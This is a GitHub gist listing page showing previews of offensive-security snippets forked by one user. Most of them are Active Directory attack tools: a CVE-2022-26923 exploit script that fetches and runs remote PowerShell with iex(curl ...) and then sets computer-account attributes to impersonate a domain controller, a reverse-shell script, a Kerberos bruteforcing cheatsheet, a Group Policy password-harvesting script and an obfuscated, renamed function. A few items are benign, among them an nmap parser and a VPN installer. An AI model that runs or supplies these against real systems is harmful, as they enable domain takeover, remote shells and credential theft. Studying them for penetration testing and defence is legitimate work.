Skip to content

Instantly share code, notes, and snippets.

View Dviros's full-sized avatar
💭
😼 😼 😼 😼 😼 😼 😼 😼 😼 😼

Dvir S. Dviros

💭
😼 😼 😼 😼 😼 😼 😼 😼 😼 😼
132 followers · 52 following
View GitHub Profile
@Dviros
Dviros / CVE-2022–26923.ps1
Created May 12, 2022 07:59 — forked from Wh04m1001/CVE-2022–26923.ps1
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
#in my testing i had to set dnshostname to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local
@Dviros
Dviros / DynWin32-ReverseShell.ps1
Created January 30, 2022 15:38 — forked from qtc-de/DynWin32-ReverseShell.ps1
PowerShell reverse shell that uses dynamically resolved Win32 API functions
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. It's only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
@Dviros
Dviros / osed-setup.bat
Created September 14, 2021 10:41 — forked from alichtman/osed-setup.bat
:: Windows 10 OSED Setup
::
:: Connect over RDP with: rdesktop IP -u Offsec -p lab -r disk:kali=/home/kali/OSED/ -P
:: Store files in ~/OSED/files/. Check script for appropriate file locations
::
:: Extra files sourced from: https://github.com/corelan/windbglib
::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: Install mona
@Dviros
Dviros / Workstation-Takeover.md
Created July 25, 2021 20:50 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@Dviros
Dviros / kerberos_attacks_cheatsheet.md
Created June 15, 2020 20:12 — forked from knethteo/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@Dviros
Dviros / Preparación OSCP.md
Created April 3, 2020 14:19 — forked from s4vitar/Preparación OSCP.md
@Dviros
Dviros / nmap_parser.ps1
Last active July 23, 2019 22:33
Simple and effective NMAP parser using PowerShell
$file = read-host "Full path for NMAP scan XML file, eg C:\nmap.xml"
$xml = [xml](Get-Content $file)
$Results = $Xml.nmaprun.host |
ForEach-Object {
$hash = [ordered]@{}; $hash.Address = $_.address.addr
Foreach ($port in $_.ports.port) {
$hash."$($port.service.name)" = $port.state.state
}
@Dviros
Dviros / wireguard_pihole_install.sh
Created April 29, 2019 19:49 — forked from sethenoka/wireguard_pihole_install.sh
A script for installing a Wireguard VPN with Pi-Hole (Unbound) recursive DNS
#!/bin/bash
# This file is designed to spin up a Wireguard VPN quickly and easily,
# including configuring Pi-Hole as a recursive local DNS server using
# Unbound to block ads a the DNS level
#
# Make sure to change the public/private keys before running the script
# Also change the IPs, IP ranges, and listening port if desired
# add wireguard repo
sudo add-apt-repository ppa:wireguard/wireguard -y
@Dviros
Dviros / Get-GPPPassword_multi_domain.ps1
Created April 4, 2019 12:32
Quick and dirty AD query script, in use for multi AD environments. This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.
# Quick and dirty AD query script, in use for multi AD environments.
# This script utilizes Powersploit's GPPPassword tool (Chris Campbell, obscuresec) to run.
##############################################################################################################
$domains = ("Domain1”,”Domain2”)
Import-Module PATH_TO_FILE\Get-GPPPassword.ps1
foreach ($domain in $domains){
Write-Host "Testing SMB Connectivity to" $domain
@Dviros
Dviros / Tralala.ps1
Last active March 11, 2019 17:31
This file has been truncated, but you can view the full file.
function Invoke-Kukuriku21112222
{
[CmdletBinding(DefaultParameterSetName="Dupiduuuuu123")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,
[Parameter(ParameterSetName = "Dupiduuuuu123", Position = 1)]
[Switch]